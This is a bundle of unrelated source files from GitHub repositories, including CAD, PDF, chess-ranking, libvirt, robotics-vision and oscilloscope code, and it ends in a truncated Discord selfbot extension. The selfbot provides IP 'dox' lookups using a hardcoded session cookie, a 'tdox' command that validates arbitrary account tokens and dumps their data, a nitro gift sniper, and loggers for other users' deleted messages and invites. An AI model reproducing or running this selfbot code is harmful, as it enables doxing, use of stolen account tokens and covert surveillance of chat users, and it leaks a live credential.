(_extra_leeway_around_cutout_layer_three/2)\n )\n )\n # Set hinge the hinge size (plus a tiny bit of wiggle room) away from the top\n _layer_three_hinge_line = Line(\n start=Point(x=0,\n y=(_base_rectangle.rectangle_dimensions.height - (hinge_size + _extra_vertical_leeway_around_hinge_layer_three))),\n end= Point(x=_base_rectangle.rectangle_dimensions.width,\n y= (_base_rectangle.rectangle_dimensions.height - (hinge_size + _extra_vertical_leeway_around_hinge_layer_three)))\n )\n _layer_three = [\n _layer_three_base,\n _layer_three_cutout,\n _layer_three_hinge_line\n ]\n return [_layer_one, _layer_two, _layer_three]\n\n\n\ndef main():\n # @@@ Change any of the numbers here\n real_world_objects = RealWorldObjects(\n lino_width_inches=2,\n lino_height_inches=2,\n paper_border_inches=0.5)\n circle_radius = inches_to_cm(1/16)\n tiny_extra_offset = inches_to_cm(1/4)\n extra_space_around_paper_inches=1\n hinge_size= inches_to_cm(1)\n file_name = \"test_printing_frame.dxf\"\n printing_frame_split_by_layers= create_layers_for_printing_without_offset_between_layers(\n real_world_objects=real_world_objects,\n extra_space_around_paper_inches= extra_space_around_paper_inches,\n hinge_size= hinge_size,\n circle_radius= circle_radius)\n\n # Add an offset for each layer, and flatten the list of shapes (previously split up by layers) into a list\n printing_frame=[]\n for layer_number, layer in enumerate(printing_frame_split_by_layers):\n # Calculate this layer's offset\n if layer_number == 0:\n x_offset = 0\n else:\n previous_layer = printing_frame_split_by_layers[layer_number-1]\n # Note that this is assuming nothing in the current layer goes to the left of 0.\n max_x_of_everything_in_previous_layer = [shape.max_x() for shape in previous_layer]\n max_width_previous_layer = max(max_x_of_everything_in_previous_layer)\n x_offset = (max_width_previous_layer + tiny_extra_offset) * layer_number\n # Add a tiny bit extra so layers don't overlap\n offset = Point(x=x_offset, y= 0)\n\n # Create a flat list of shapes (not split into layers, with each shape offset by the appropriate amount for its layer)\n for shape in layer:\n printing_frame.append(shape.copy_and_add_additional_offset(offset))\n print(shape)\n # Iterate through the list of shapes, writing them to file\n with r12writer(file_name) as dxf:\n for shape in printing_frame:\n shape.draw_dxf(dxf)\n\n\nmain()\n","repo_name":"johadalin/keyboard_footprint_dxf","sub_path":"print_frame.py","file_name":"print_frame.py","file_ext":"py","file_size_in_byte":10427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"28433420148","text":"# Пусть, например, заданы три числа: a1, a2, a3. Ваша задача – по заданным трем числам определить: \n# можно ли их переставить так, чтобы сумма первых двух равнялась третьему. \n# Первая строка входного файла INPUT.TXT содержит три целых числа через пробел: a1, a2, a3. \n# В выходной файл OUTPUT.TXT выведите слово «YES», если заданные числа можно переставить так, \n# чтобы сумма первых двух равнялась третьему. В противном случае ��ыведите в выходной файл слово «NO».\n\ndef Calc(x, y, z):\n if x == (y + z) or y == (x + z) or z == (x + y):\n res = 'YES'\n else: res = 'NO'\n return res\n\nwith open('D:\\Works\\IT\\Python_Start\\Tasks\\Difficulty_1_10\\Task_970\\input.txt', 'r') as input_data:\n a1, a2, a3 = map(int, input_data.read().split())\nwith open('D:\\Works\\IT\\Python_Start\\Tasks\\Difficulty_1_10\\Task_970\\output.txt', 'w') as output_data:\n output_data.write(Calc(a1, a2, a3))\n \nprint(Calc(a1, a2, a3))","repo_name":"adachel/Python_Start","sub_path":"Education/Tasks/Difficulty_1_10/Task_970/Task_970.py","file_name":"Task_970.py","file_ext":"py","file_size_in_byte":1251,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"31207490771","text":"from tkinter import PAGES, Variable\nfrom fpdf import FPDF\nimport pandas as pd\n\n# Create PDF object with specified settings\npdf = FPDF(orientation=\"P\", unit=\"mm\", format=\"A4\")\npdf.set_auto_page_break(auto=False, margin=0)\n\n# Read data from CSV file\ndf = pd.read_csv(\"topics.csv\")\n\n# Iterate over rows in dataframe and create PDF pages\nfor index, row in df.iterrows():\n pdf.add_page()\n\n # Set font, color and print topic on the page\n pdf.set_font(family=\"Times\", style='B', size=24)\n pdf.set_text_color(100, 100, 100)\n pdf.cell(w=0, h=12, txt=row[\"Topic\"], align=\"L\", ln=1)\n\n # Add horizontal line after topic\n pdf.line(10, 22, 200, 22)\n\n # Add vertical lines with interval of 10mm\n for space in range(0, 260, 10):\n pdf.line(10, 32 + space, 200, 32 + space)\n\n # Set footer at bottom of the page\n pdf.ln(265)\n pdf.set_font(family=\"Times\", style='I', size=8)\n pdf.set_text_color(100, 180, 100)\n pdf.cell(w=0, h=10, txt=row[\"Topic\"], align=\"R\")\n\n # Add additional pages for the topic if necessary\n for i in range(row[\"Pages\"] - 1):\n pdf.add_page()\n\n # Set footer on additional pages\n pdf.ln(277)\n pdf.set_font(family=\"Times\", style='I', size=8)\n pdf.set_text_color(100, 180, 100)\n pdf.cell(w=0, h=10, txt=row[\"Topic\"], align=\"R\")\n\n # Add vertical lines with interval of 10mm on additional pages\n for space in range(0, 260, 10):\n pdf.line(10, 32 + space, 200, 32 + space)\n\n# Output PDF file\npdf.output(\"output.pdf\")","repo_name":"asieduofeijnr/Pdf_Generator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"9935301591","text":"from vues.affichage_modification_classement import *\nfrom controleurs.outils_controleurs import OutilsControleurs\nfrom os import system as sys\nfrom tinydb import TinyDB, Query\n\n\nclass ModificationClassement:\n \"\"\"\n Classe servant a modifier le classement d'un joueur.\n type d'arguments : dict\n \"\"\"\n\n def __init__(self, nom_joueurs_classement):\n self.nom_joueurs_classement = nom_joueurs_classement\n\n def modification_classement_tounoi(self):\n \"\"\"\n Methode modifiant le classement des joueurs d'un tournoi fini.\n \"\"\"\n x = len(self.nom_joueurs_classement)\n a = 1\n list_nom = []\n while a <= x:\n reponse = 0\n while reponse == 0 or reponse > x:\n try:\n sys(OutilsControleurs.which_os())\n z = 1\n for arg in self.nom_joueurs_classement:\n if arg not in list_nom:\n print(nom_disponible(z, arg))\n z += 1\n reponse = int(input(input_choix_joueur()))\n except ValueError:\n print(\"\\nVous n'avez pas saisi un nombre valide.\")\n sys(OutilsControleurs.which_os())\n continue\n nom_joueur = \"\"\n e = 1\n for nom, classement in self.nom_joueurs_classement:\n if e == reponse:\n nom_joueur = nom\n e += 1\n e = 1\n for arg in self.nom_joueurs_classement:\n if e == reponse:\n list_nom.append(arg)\n e += 1\n reponse_2 = 0\n while reponse_2 == 0 or reponse_2 > x:\n try:\n reponse_2 = int(input(input_choix_classement(nom_joueur)))\n except ValueError:\n print(\"\\nVous n'avez pas saisi un nombre valide.\")\n continue\n nom_joueur = nom_joueur.split(\" \")\n a += 1\n db_file = 'data/joueurs.json'\n db = TinyDB(db_file)\n db = db.table(\"Joueur\")\n db.all()\n nom_joueur_db = Query()\n db.update({\"classement\": reponse_2}, nom_joueur_db.nom == nom_joueur[0])\n\n def modification_classement(self):\n \"\"\"\n Methode modifiant le classement d'un joueur en dehors d'une fin de tournoi.\n \"\"\"\n z = len(self.nom_joueurs_classement) + 1\n reponse = 0\n while reponse != z:\n reponse = 0\n while reponse == 0 or reponse > z:\n try:\n sys(OutilsControleurs.which_os())\n x = 1\n for arg in self.nom_joueurs_classement:\n arg = str(arg).replace(\"\\n\", \"\")\n print(nom_disponible(x, arg))\n x += 1\n print(retour(x))\n reponse = int(input(input_choix_joueur()))\n except ValueError:\n print(\"\\nVous n'avez pas saisi un nombre valide.\")\n sys(OutilsControleurs.which_os())\n continue\n if reponse == z:\n return\n nom_joueur = \"\"\n e = 1\n for nom in self.nom_joueurs_classement:\n if e == reponse:\n nom = str(nom).replace(\"\\n\", \"\")\n nom_joueur = nom\n e += 1\n reponse_2 = 0\n while reponse_2 == 0 or reponse_2 > x:\n try:\n reponse_2 = int(input(input_choix_classement(nom_joueur)))\n except ValueError:\n print(\"\\nVous n'avez pas saisi un nombre valide.\")\n continue\n nom_joueur = nom_joueur.split(\" \")\n db_file = 'data/joueurs.json'\n db = TinyDB(db_file)\n db = db.table(\"Joueur\")\n db.all()\n nom_joueur_db = Query()\n db.update({\"classement\": reponse_2}, nom_joueur_db.nom == nom_joueur[0])\n","repo_name":"ChevallierQ/P4_01_tournois_echecs_fini","sub_path":"controleurs/modification_classement.py","file_name":"modification_classement.py","file_ext":"py","file_size_in_byte":4110,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"30436028359","text":"import logging as log\n\nfrom avocado.utils import process\nfrom avocado.utils import astring\n\nfrom virttest import libvirt_xml\nfrom virttest import virsh\nfrom virttest.libvirt_xml.devices import interface\nfrom virttest.utils_test import libvirt as utlv\n\n\n# Using as lower capital is not the best way to do, but this is just a\n# workaround to avoid changing the entire file.\nlogging = log.getLogger('avocado.' + __name__)\n\n\ndef run(test, params, env):\n \"\"\"\n Test if domain destroy with nwfilter will\n produce error messege in libvirt.log\n\n 1) set env\n 2) run command and check result\n 3) clean env\n \"\"\"\n\n vm_name = params.get(\"main_vm\")\n vm = env.get_vm(vm_name)\n status_error = \"yes\" == params.get(\"status_error\")\n vmxml_backup = libvirt_xml.vm_xml.VMXML.new_from_inactive_dumpxml(vm_name)\n filter_name = params.get(\"filter_name\")\n check_cmd = params.get(\"check_cmd\")\n\n def set_env():\n vmxml = libvirt_xml.VMXML.new_from_inactive_dumpxml(vm_name)\n iface_xml = vmxml.get_devices('interface')[0]\n vmxml.del_device(iface_xml)\n new_iface = interface.Interface('network')\n new_iface.xml = iface_xml.xml\n new_iface.type_name = \"network\"\n new_iface.source = {'network': \"default\"}\n filter_dict = {}\n filter_dict['name'] = filter_name\n filter_dict['parameters'] = []\n new_iface.filterref = new_iface.new_filterref(**filter_dict)\n logging.debug(\"new iface is %s\" % new_iface)\n vmxml.add_device(new_iface)\n vmxml.sync()\n\n try:\n # set env\n set_env()\n # start vm\n ret = virsh.start(vm_name, debug=True)\n utlv.check_exit_status(ret, status_error)\n # destroy vm see if libvirtd.log will get error\n virsh.destroy(vm_name)\n utlv.check_exit_status(ret, status_error)\n out = astring.to_text(process.system_output(\n check_cmd, ignore_status=True, shell=True))\n if out:\n test.fail(\"libvirtd.log get error\")\n\n finally:\n if vm.is_alive():\n vm.destroy(gracefully=False)\n vmxml_backup.sync()\n","repo_name":"autotest/tp-libvirt","sub_path":"libvirt/tests/src/nwfilter/vm_destroy_with_nwfilter.py","file_name":"vm_destroy_with_nwfilter.py","file_ext":"py","file_size_in_byte":2129,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"69"}
+{"seq_id":"28481417750","text":"import sys\nimport re\n\ndef main():\n with open(sys.argv[1],'r') as f:\n for line in f:\n cigar = line.split('\\t')[5]\n x = re.search('M',cigar)\n y = re.findall(\"[0-9]+\",cigar[:x.start()])\n print(y[-1])\n f.close()\n\nif __name__ == '__main__':\n main()","repo_name":"baolab-rice/LongAmpseq","sub_path":"temp/Match_checking.py","file_name":"Match_checking.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"69"}
+{"seq_id":"28020779460","text":"import json, time, sys, cscore, numpy, pixy, cv2\nfrom cscore import CameraServer, VideoSource, UsbCamera, MjpegServer, CvSource\nfrom networktables import NetworkTablesInstance, NetworkTables\n\n#-------------------------------------------------------------------------------------\n\n#____________/\\\\\\______/\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\______/\\\\\\\\\\\\\\_______________/\\\\\\____\n# __________/\\\\\\\\\\_____\\/\\\\\\///////////_____/\\\\\\/////\\\\\\___________/\\\\\\\\\\____\n# ________/\\\\\\/\\\\\\_____\\/\\\\\\_______________/\\\\\\____\\//\\\\\\________/\\\\\\/\\\\\\____\n# ______/\\\\\\/\\/\\\\\\_____\\/\\\\\\\\\\\\\\\\\\\\\\\\_____\\/\\\\\\_____\\/\\\\\\______/\\\\\\/\\/\\\\\\____\n# ____/\\\\\\/__\\/\\\\\\_____\\////////////\\\\\\___\\/\\\\\\_____\\/\\\\\\____/\\\\\\/__\\/\\\\\\____\n# __/\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\_____________\\//\\\\\\__\\/\\\\\\_____\\/\\\\\\__/\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\_\n# _\\///////////\\\\\\//___/\\\\\\________\\/\\\\\\__\\//\\\\\\____/\\\\\\__\\///////////\\\\\\//__\n# ___________\\/\\\\\\____\\//\\\\\\\\\\\\\\\\\\\\\\\\\\/____\\///\\\\\\\\\\\\\\/_____________\\/\\\\\\____\n# ___________\\///______\\/////////////________\\///////_______________\\///_____\n# Welcome to Team 4504's offboard vision code the raspberry pi.\n\n# Contributors:\n# porgull/Connor Barker\n\n#-------------------------------------------------------------------------------------\n\n# JSON format:\n# {\n# \"team\": ,\n# \"ntmode\": <\"client\" or \"server\", \"client\" if unspecified>\n# \"cameras\": [\n# {\n# \"name\": \n# \"path\": \n# \"pixel format\": <\"MJPEG\", \"YUYV\", etc> // optional\n# \"width\": // optional\n# \"height\": // optional\n# \"fps\": // optional\n# \"brightness\": // optional\n# \"white balance\": <\"auto\", \"hold\", value> // optional\n# \"exposure\": <\"auto\", \"hold\", value> // optional\n# \"pixy\": \n# \"stream\": { // optional\n# \"properties\": [\n# {\n# \"name\": \n# \"value\": \n# }\n# ]\n# }\n# }\n# ]\n# }\n\n#-------------------------------------------------------------------------------------\n\n# MOST CODE IS UNEDITED FROM THE EXAMPLE:\n\nconfigFile = \"/boot/frc.json\"\n\nclass CameraConfig: pass\n\nteam = 4504\nserver = False\ncameraConfigs = []\npixy_source = None\nvectors = pixy.VectorArray(1)\n\n\n\"\"\"Report parse error.\"\"\"\ndef parseError(str):\n print(\"config error in '\" + configFile + \"': \" + str, file=sys.stderr)\n\n\"\"\"Read single camera configuration.\"\"\"\ndef readCameraConfig(config):\n cam = CameraConfig()\n\n # name\n try:\n cam.name = config[\"name\"]\n except KeyError:\n parseError(\"could not read camera name\")\n return False\n\n # path\n try:\n cam.path = config[\"path\"]\n except KeyError:\n parseError(\"camera '{}': could not read path\".format(cam.name))\n return False\n\n\n #ADDED CODE: add pixy as a camera property\n try:\n cam.pixy = config[\"pixy\"]\n except KeyError:\n parseError(\"camera '{}': could not read pixy\".format(came.name))\n\n # stream properties\n cam.streamConfig = config.get(\"stream\")\n\n cam.config = config\n\n cameraConfigs.append(cam)\n return True\n\n\"\"\"Read configuration file.\"\"\"\ndef readConfig():\n global team\n global server\n\n # parse file\n try:\n with open(configFile, \"rt\") as f:\n j = json.load(f)\n except OSError as err:\n print(\"could not open '{}': {}\".format(configFile, err), file=sys.stderr)\n return False\n\n # top level must be an object\n if not isinstance(j, dict):\n parseError(\"must be JSON object\")\n 
return False\n\n    # team number\n    try:\n        team = j[\"team\"]\n    except KeyError:\n        parseError(\"could not read team number\")\n        return False\n\n    # ntmode (optional)\n    if \"ntmode\" in j:\n        str = j[\"ntmode\"]\n        if str.lower() == \"client\":\n            server = False\n        elif str.lower() == \"server\":\n            server = True\n        else:\n            parseError(\"could not understand ntmode value '{}'\".format(str))\n\n    # cameras\n    try:\n        cameras = j[\"cameras\"]\n    except KeyError:\n        parseError(\"could not read cameras\")\n        return False\n    for camera in cameras:\n        if not readCameraConfig(camera):\n            return False\n\n    return True\n\n\"\"\"Start running the camera.\"\"\"\ndef startCamera(config):\n    print(\"Starting camera '{}' on {}\".format(config.name, config.path))\n    inst = CameraServer.getInstance()\n    camera = None\n    server = None\n\n\n    #ADDED CODE: handle pixy camera capture by creating a cvsource, otherwise normal\n    if config.pixy:\n        #if the camera is a pixy, get a CvSource to put the generated images in\n        global pixy_source\n        pixy_source = inst.putVideo(\"Pixy\", 51, 51)\n    else:\n        #if the camera is not a pixy, automatically capture it\n        camera = UsbCamera(config.name, config.path)\n        server = inst.startAutomaticCapture(camera=camera, return_server=True)\n\n        #only configure the capture here: for a pixy, camera and server stay None\n        camera.setConfigJson(json.dumps(config.config))\n        camera.setConnectionStrategy(VideoSource.ConnectionStrategy.kKeepOpen)\n\n        if config.streamConfig is not None:\n            server.setConfigJson(json.dumps(config.streamConfig))\n\n    return camera\n\n#-------------------------------------------------------------------------------------\n#ADDED CODE: Initialize and generate pixy images\n\ndef initialize():\n    #initialize the pixy in the module\n    pixy.init()\n    #ensure it is switched to detect the tape on the ground\n    pixy.change_prog(\"line\")\n\ndef get_pixy_image():\n    #get the vector and put it to the VectorArray\n    pixy.line_get_all_features()\n    pixy.line_get_vectors(1, vectors)\n\n    #create a black image and add the line\n    image = numpy.zeros((51, 51, 1), dtype=numpy.uint8)\n    cv2.line(image, (vectors[0].m_y0,vectors[0].m_x0), (vectors[0].m_y1, vectors[0].m_x1), 256, thickness=5)\n    return image\n\n#-------------------------------------------------------------------------------------\n\nif __name__ == \"__main__\":\n    if len(sys.argv) >= 2:\n        configFile = sys.argv[1]\n\n    # read configuration\n    if not readConfig():\n        sys.exit(1)\n\n    # start NetworkTables\n    ntinst = NetworkTablesInstance.getDefault()\n    ntinst.startClientTeam(team)\n\n    #ADDED: get the SmartDashboard to output to automatically\n    #get the SmartDashboard table\n    NetworkTables.initialize(server='roborio-4504-frc.local')\n    sd = NetworkTables.getTable('SmartDashboard')\n\n    # start cameras\n    cameras = []\n    for cameraConfig in cameraConfigs:\n        cameras.append(startCamera(cameraConfig))\n\n    #initialize the pixy camera\n    initialize()\n\n    # loop forever\n    while True:\n        #ADDED CODE: in the loop, continually get and output values\n\n        #create image from the pixy\n        image = get_pixy_image()\n        #put the created image to the cameraserver\n        pixy_source.putFrame(image)\n\n        #put useful values about the vector to the SmartDashboard\n        #both for debug and for PID\n        sd.putNumber(\"y0\",vectors[0].m_y0)\n        sd.putNumber(\"x0\",vectors[0].m_x0)\n        sd.putNumber(\"y1\",vectors[0].m_y1)\n        sd.putNumber(\"x1\",vectors[0].m_x1)\n\n        #compute the error for PID\n        #error is the midpoint of the line's distance from\n        #the center of the robot's motion\n        sd.putNumber(\"error\", ((vectors[0].m_x0 + vectors[0].m_x1)/2) - 
36)\n","repo_name":"BlountCountyRobotics/FRC2019-Vision","sub_path":"multiCameraServer.py","file_name":"multiCameraServer.py","file_ext":"py","file_size_in_byte":7733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"16908940974","text":"#!/usr/bin/python\n\nimport time\nimport socket\nimport argparse\nimport threading\nimport struct\nimport pyhantek\n\nclass SCPIServer:\n def __init__(self, bind_ip=\"localhost\", control_port=5025, waveform_port=5026):\n self.bind_ip = bind_ip\n self.control_port = control_port\n self.waveform_port = waveform_port\n self.hantek = pyhantek.Hantek()\n\n def open(self):\n print(f\"Opening Server {self.bind_ip}:c{self.control_port:d}:w{self.waveform_port:d}...\")\n self.control_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.control_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n self.control_sock.bind((self.bind_ip, self.control_port))\n self.control_sock.listen(1)\n\n self.waveform_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.waveform_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n self.waveform_sock.bind((self.bind_ip, self.waveform_port))\n self.waveform_sock.listen(1)\n\n def close(self):\n print(\"Closing Server...\")\n self.control_sock.close()\n del self.control_sock\n self.waveform_sock.close()\n del self.waveform_sock\n\n def _control_thread(self):\n while True:\n client, addr = self.control_sock.accept()\n #client.settimeout(1000)\n print(f\"Control: Connected with {addr[0]}:{str(addr[1])}\")\n in_buff = b\"\"\n while True:\n try:\n #data = client.recv(1024).decode(\"UTF-8\")\n data = client.makefile().readline()\n except Exception as e:\n print(e)\n print(\"Control: Disconnect\")\n client.close()\n if len(data) < 1:\n break\n\n cmd = data.split()\n multi_cmd = cmd[0].split(\":\")\n print(cmd, multi_cmd)\n\n # Get\n if \"IDN?\" in data:\n client.send(bytes(\"Hantek,Hantek6xx4B,0001,0.1\\n\", \"UTF-8\"))\n elif \"CHANS?\" in data:\n client.send(bytes(\"4\\n\", \"UTF-8\"))\n elif \"RATES?\" in data:\n rates = \",\".join(map(str,self.hantek.get_rates()))\n print(rates)\n client.send(bytes(rates+\"\\n\", \"UTF-8\"))\n elif \"DEPTHS?\" in data:\n client.send(bytes(\"4096\\n\", \"UTF-8\"))\n elif \"GAIN?\" in data:\n client.send(bytes(\"1\\n\", \"UTF-8\"))\n elif \"OFFS?\" in data:\n client.send(bytes(\"0\\n\", \"UTF-8\"))\n\n # Set\n elif \"RATE\" == cmd[0]:\n rate = int(cmd[1])\n self.hantek.set_rate(rate)\n\n elif len(multi_cmd) > 1:\n if multi_cmd[0] == \"TRIG\":\n if multi_cmd[1] == \"LEV\":\n level = float(cmd[1])\n print(\"setting trigger level\", level)\n self.hantek.set_trigger_level(level)\n else:\n client.send(b\"\")\n\n def _waveform_thread(self):\n while True:\n client, addr = self.waveform_sock.accept()\n print(f\"Waveform: Connected with {addr[0]}:{str(addr[1])}\")\n try:\n while True:\n data = self.hantek.read_buffer()\n rate = self.hantek.get_rate()\n fs_per_sample = int((10**15) / rate)\n # uint16_t numChannels; int64_t fs_per_sample;\n sample_hdr = struct.pack(\" None:\n self.bot: Bot = bot\n self.nitro_toggle: bool = False\n self.msg_toggle: bool = False\n self.inv_toggle: bool = False\n self.afk_message: bool | None = None\n self.timestamp: int = 0\n self.INVITE_REGEX = re.compile(\n r\"(http://|https://|)(discord.gg/|canary.discord.com/invite/|ptb.discord.com/invite/|discordapp.com/invite/|discord.com/invite/)[A-z]{3,20}\"\n )\n self.NITRO_REGEX = re.compile(\n r\"(http://|https://|)(discord.com/gifts/|discordapp.com/gifts/|discord.gift/|canary.discord.com/gifts/|ptb.discord.com/gifts)([a-zA-Z0-9]{5,18})\"\n )\n @Extender.cmd(\n description=\"Gather information regarding an IP address, IPv4 only\", aliases=['ipdox', 'geoip']\n )\n async def ipinfo(self, ctx: Context, ip: 
str):\n await ctx.message.delete()\n async with aiohttp.ClientSession() as session:\n async with session.get(f\"https://ipinfo.io/account/search?query={ip}\", headers={\n \"referer\":\"https://ipinfo.io/account/search\",\n \"connection\": \"keep-alive\",\n \"content-type\": \"application/json\",\n \"origin\": \"ipinfo.io\", \n \"user-agent\": \"Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/114.0\",\n \"cookie\": \"flash=; stripe_mid=b86b556f-9fe0-4d16-a708-ba98416e86d55bcf15; jwt-express=eyJhbGciOiJFUzUxMiIsInR5cCI6IkpXVCJ9.eyJ1c2VyX2lkIjo5NDEzNzcsImVtYWlsIjoiYW1pbi5kZXYwM0BnbWFpbC5jb20iLCJjcmVhdGVkIjoiYSBmZXcgc2Vjb25kcyBhZ28oMjAyMy0wNy0wNFQyMDozMTo0Mi4xNjRaKSIsInN0cmlwZV9pZCI6bnVsbCwiaWF0IjoxNjg4NTAyNzAyLCJleHAiOjE2OTEwOTQ3MDJ9.AMgurkX6peNX18MnUN7fK6TZFAZ7cuyurBoqprZaU_8s0g-QiAjhCkK-BqgpIVdmxOah4guAq7NUV1zGPWCZ1x47ACZrRYm32QZ-S7jMasi3WMsXT2a8mzG0GTrKQoE3lsvj5mg_AmlnxZYLhsACcFL0pWvMCiLTuAQ-CXS1ZMWId4eX; onboarding=0; stripe_sid=16f2b50b-95ca-4d76-b3b3-01440c54fe1e626512\"\n }) as resp:\n json = await resp.json()\n msg = TextEmbed().title(\"IP Geolocation\")\n for act_key, value in json.items():\n if act_key in ['asn', 'privacy', 'company', 'abuse', 'domains']:\n msg.subheading(act_key.capitalize())\n for key, value in json[act_key].items():\n msg.add_field(f\" {key}\", value)\n continue\n if act_key == \"tokenDetails\":\n msg.subheading(act_key.capitalize())\n for key, value in json[act_key].items():\n if key in ['hostio', 'core']:\n msg.add_field(f\" {key}\", value)\n continue\n msg.add_field(act_key, value)\n await ctx.send(msg, delete_after=60)\n @Extender.cmd(\n description=\"Gathers information regarding token\", aliases=[\"tdox\", \"tinfo\"]\n )\n async def tokeninfo(self, ctx: Context, _token: str):\n \"\"\"Gathers information regarding a token, works for both bot tokens and user tokens.\"\"\"\n await ctx.message.delete()\n data = await self.bot.http.request(\n \"get\", \"/users/@me\", headers={\"authorization\": f\"Bot {_token}\"}\n )\n if data is None:\n data = await self.bot.http.request(\n \"get\", \"/users/@me\", headers={\"authorization\": _token}\n )\n if data is not None:\n msg = TextEmbed().title(\"Token Information\")\n for key, value in data.items():\n msg.add_field(key, value)\n await ctx.send(msg, delete_after=60)\n else:\n await ctx.send(\"Token is Invalid!\", delete_after=60)\n\n @Extender.cmd(description=\"Toggles Nitro Sniper\", aliases=[\"nsnipe\", \"nsniper\"])\n async def nitrosniper(self, ctx: Context, toggle: str):\n \"\"\"Toggles the nitro sniper, the nitro sniper attempts to redeem any nitro gift code immediately as the gateway receives it. 
Information whether the redeeming of the gift was successful or not is displayed via the console.\"\"\"\n if toggle.lower() == \"on\" or toggle.lower() == \"true\":\n self.nitro_toggle = True\n await ctx.reply(\"**Nitro Sniper is ON**\", delete_after=60)\n elif toggle.lower() == \"off\" or toggle.lower() == \"false\":\n self.nitro_toggle = False\n await ctx.reply(\"**Nitro Sniper is OFF**\", delete_after=60)\n\n @Extender.cmd(\n description=\"Toggles Message Logger\",\n aliases=[\"msgsniper\", \"msglogger\", \"msgsnipe\", \"msnipe\"],\n )\n async def messagesniper(self, ctx: Context, toggle: str):\n \"\"\"Toggles the message sniper, attempts to display deleted messages via the console, can only gather the full data of deleted messages after the bot starts running since they are cached, messages prior are not cached and therefore cannot be completely logged.\"\"\"\n if toggle.lower() == \"on\" or toggle.lower() == \"true\":\n self.msg_toggle = True\n await ctx.reply(\"**Message Logger is ON**\", delete_after=60)\n elif toggle.lower() == \"off\" or toggle.lower() == \"false\":\n self.msg_toggle = False\n await ctx.reply(\"**Message Logger is OFF**\", delete_after=60)\n\n @Extender.cmd(\n description=\"Toggles Invite Logger\",\n aliases=[\"invlog\", \"invlogger\", \"ilog\", \"ilogger\"],\n )\n async def invitelogger(self, ctx: Context, toggle: str):\n \"\"\"Toggles the invite logger, attempts to display any/all invites posted in chat via the console.\"\"\"\n if toggle.lower() == \"on\" or toggle.lower() == \"true\":\n self.inv_toggle = True\n await ctx.reply(\"**Invite Logger is ON**\", delete_after=60)\n elif toggle.lower() == \"off\" or toggle.lower() == \"false\":\n self.inv_toggle = False\n await ctx.reply(\"**Invite Logger is OFF**\", delete_after=60)\n\n @Extender.cmd(description=\"Purges all messages in chat\", aliases=[\"wipe\"])\n async def purge(self, ctx: Context, amount: int = 100):\n \"\"\"Purges all your own messages in the chat.\"\"\"\n await ctx.message.delete()\n await ctx.purge(amount)\n\n @Extender.cmd(description=\"Sets AFK status for user\")\n async def afk(self, ctx: Context, *, message: str):\n self.afk_message = message\n self.timestamp = int(time())\n await ctx.send(f\">>> # USER IS AFK\\n*{message}*\\n****\")\n\n @Extender.cmd(description=\"Snipes last send message\")\n async def snipe(self, ctx: Context):\n for message in reversed(self.bot.user.deleted_messages):\n if message.channel == ctx.channel:\n msg = TextEmbed().title(\"Sniped Message\").add_field(f\"{datetime.datetime.fromtimestamp(message.deleted_time).strftime('%H:%M:%S')} | {message.author.name}\", message.content)\n if len(message.attachments) > 0:\n for atch in message.attachments:\n msg += f\"{atch.proxy_url}\\n\"\n return await ctx.reply(msg, delete_after=60)\n\n @Extender.cmd(description=\"Create an invite for people to add you with\", aliases=['friend_invite', 'inv'])\n async def invite(self, ctx):\n await ctx.reply(f\"discord.gg/{(await self.bot.friend_invite())}\")\n\n @Extender.cmd(description=\"View current active invites\", aliases=['view_invites', 'view_invite', 'view_inv'])\n async def view_in(self, ctx):\n invites = await self.bot.view_invites()\n msg = TextEmbed().title(\"User Invites\")\n for inv in invites:\n for invite, expire in inv.items():\n msg.add_field(invite, expire)\n await ctx.reply(msg)\n \n @Extender.on(\"message_delete\")\n async def message_logger(self, message):\n if self.msg_toggle:\n if message.author != None:\n if message.author != self.bot.user:\n if message.guild != 
None:\n                        await aprint(\n                            f\"\"\"MESSAGE LOGGED:\nSERVER: {message.guild.name}\nCHANNEL: {message.channel.name}\nCONTENT:\n{message.author}: {message.content}\n                    \"\"\"\n                        )\n                    else:\n                        await aprint(\n                            f\"\"\"MESSAGE LOGGED:\nCHANNEL: {message.channel}\nCONTENT:\n{message.author}: {message.content}\n                    \"\"\"\n                        )\n\n    @Extender.on(\"message\")\n    async def invite_logger(self, message):\n        if self.inv_toggle:\n            matches = self.INVITE_REGEX.findall(message.content)\n            if len(matches) > 0:\n                if message.guild != None:\n                    await aprint(\n                        f\"\"\"Guild Invite Logged:\nSERVER: {message.guild.name}\nCHANNEL: {message.channel.name}\nINVITE: {matches}\n\n                \"\"\"\n                    )\n                else:\n                    await aprint(\n                        f\"\"\"Guild Invite Logged:\nCHANNEL: {message.channel.name}\nINVITE: {matches}\n                \"\"\"\n                    )\n\n    @Extender.on(\"message\")\n    async def nitro_logger(self, message):\n        if self.nitro_toggle:\n            matches = self.NITRO_REGEX.findall(message.content)\n            if len(matches) > 0:\n                for match in matches:\n                    await self.bot.redeem_nitro(match[2])\n\n    @Extender.on(\"message\")\n    async def afk_checker(self, message: Message):\n        if self.afk_message is not None:\n            for user in message.mentions:\n                if user == self.bot.user:\n                    # reply with the stored AFK note, not the triggering Message object\n                    await message.channel.reply(f\">>> # USER IS AFK\\n*{self.afk_message}*\\n****\")\n            if (message.author == self.bot.user) and (self.afk_message not in message.content):\n                self.afk_message = 